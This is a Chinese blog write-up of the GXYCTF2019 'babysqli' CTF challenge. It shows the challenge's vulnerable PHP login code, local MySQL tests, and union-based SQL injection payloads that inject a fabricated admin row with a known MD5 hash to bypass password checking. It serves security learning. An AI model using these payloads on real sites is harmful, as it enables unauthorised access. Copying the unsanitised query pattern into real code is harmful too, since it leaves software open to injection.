GXYCTF2019 babysqli

最新推荐文章于 2023-02-09 16:32:14 发布
最新推荐文章于 2023-02-09 16:32:14 发布
阅读量295 收藏 1
点赞数 1
分类专栏: ctf 文章标签: SQL注入 MD5验证 联合查询 信息绕过 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/120183207
版权

1NDEX

0x00 初试

一开始以为普通sql注入题
在这里插入图片描述
fuzz一下没过滤什么东西
or大小写直接绕过就行,但两个括号绕过之前倒没遇上过,尝试了各种编码好像也没用…
联合查询出有三列

在这里插入图片描述
那串注释是base32 ->base64 decode之后是
select * from user where username = ‘$name’

其实通过这个hint就应该意识到了,查询时只用到了username
password的校验显然不再同一处

显然直接通过注入查询不太可能了,是新东西,看个wp学习一下
该题考查绕过密码的MD5验证,不看源码 or wp我是真不会想到的…

0x01 复现

方便理解贴一下源码

$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

Tip
联合查询不存在数据时,会自动构建一个虚拟数据
&&这个虚拟数据是包含在结果集里面的

Local test一下

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.01 sec)

mysql> select * from users where username='2' union select 1,'admin',5 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 5        |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where username='admin' union select 1,'admin',5 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
|  1 | admin    | 5        |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql>

当我第一段查询不存在时,直接显示联合查询中的虚拟数据
第一段查询数据存在时,结果集先返回存在的数据
再返回一行虚拟数据

order by 4 报错–>只有三列

判断username在哪一列的方法

进行用联合注入,回显wrong user!,说明用户不在第一列

1' union select 1,2,3#

尝试将用户名放在第二列,回显wrong pass!,找到用户名在第二列

1' union select 1,'admin',3#

brain.md

首先查询一个不存在的username再联合查询我们自己构建的虚拟数据
那么结果集中仅存在我们的虚拟数据
(一个小坑 password是md5加密的,当然这算一般经验了)
这样在不知道admin原密码的情况下绕过了验证
payload:
name=1’union select 1,‘admin’,‘202cb962ac59075b964b07152d234b70’#&pw=123

md5(123)=202cb962ac59075b964b07152d234b70
此处可自己组合
在这里插入图片描述
done!

参考

https://www.cnblogs.com/gaonuoqi/p/12355035.html
https://blog.csdn.net/RABCDXB/article/details/113812068

0x02 rethink

常规思路走不通时,要学会变化。
还是碰的太少,见得太少,经验不足。

k_du1t
关注
专栏目录
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 4879
[GXYCTF2019]BabySQli 解题思路&过程
[GXYCTF2019]BabySQli(联合注入添加临时虚拟用户)
weixin_44110537的博客
09-25 209
先模糊测试. 419长度的都是被过滤掉的. 但是幸运的是发现or在大写之后绕过了过滤. 于是猜测order也可以通过大写来绕过.(真的可以). 而union并没有被过滤.说明采用联合注入很有可能是可行的. 先通过 order by 来测有几列. 通过不断二分最终可以测出一共有3个字段. 在查询过程中如果数据库中没有对应的结果,会临时创建一个虚拟用户 举例: 这是查询前的表. 接着我们尝试查询一个不存在的数据. 可能这样还不够直观,通过联合查询将直观性体现出来.(联合查询时注意列数) 可以发现多了
[GXYCTF2019]BabySQli
devilare的博客
05-18 440
[GXYCTF2019]BabySQli 刷题笔记 随便登录试试 好像是有admin这个用户名(一般都有QAQ),加入单引号,爆出错误,加入常规操作发现始终回显一样,看看源代码 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 百度一下,会发现这个是base32+base64加密得到的,解密后得到select * from user whe...
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1492
[GXYCTF 2019]BabySqli
[GXYCTF2019]BabySQli 1
最新发布
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码...
GXYCTF2019]BabySQli
shannidawang的博客
07-29 132
尝试登入 发现一个search.php 先base32解码 得到的结果进行base64解码 select * from user where username = '$name' 通过测试呢 可以猜测用户名为admin 测试字段数 1' order by 3# 只有三个字段 联合注入 1' union select 1,'admin',3 经测试 admin在第二列 当查询的数据不存在时,联合查询就会构造一个虚拟的数据 输入admin,密码为md5(123456),代入查询时MySQL里面就会生成a
[gxyctf2019]babysqli
03-16
"babysqli" 是一个 SQL 注入的题目,通常用于漏洞挖掘和安全测试目的。它通常包含一个网页表单,该表单将用户输入的数据插入到 SQL 查询中,如果网站没有正确地过滤和验证用户输入,那么攻击者可能能够通过注入恶意 ...
GXYCTF2019--BabySQli
Oavinci的博客
06-28 786
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
Buuctf web题 [GXYCTF2019]BabySQli WP
alatan9的博客
02-09 116
账号1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'尝试后发现select 1,2,3 1是账号 3是密码 2不知道是啥。发现一串密码由于多数的大写字母怀疑是base32 解密。我们可以利用union select来创建一个临时账号。需要工具的可以私聊我 技术问题也可以私聊。解密后发现是base64 再次解密。发现到4报错 说明数据库只有三列。应该是sql注入先爆破出账号。发现过滤order 尝试绕过。发现账号是admin。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值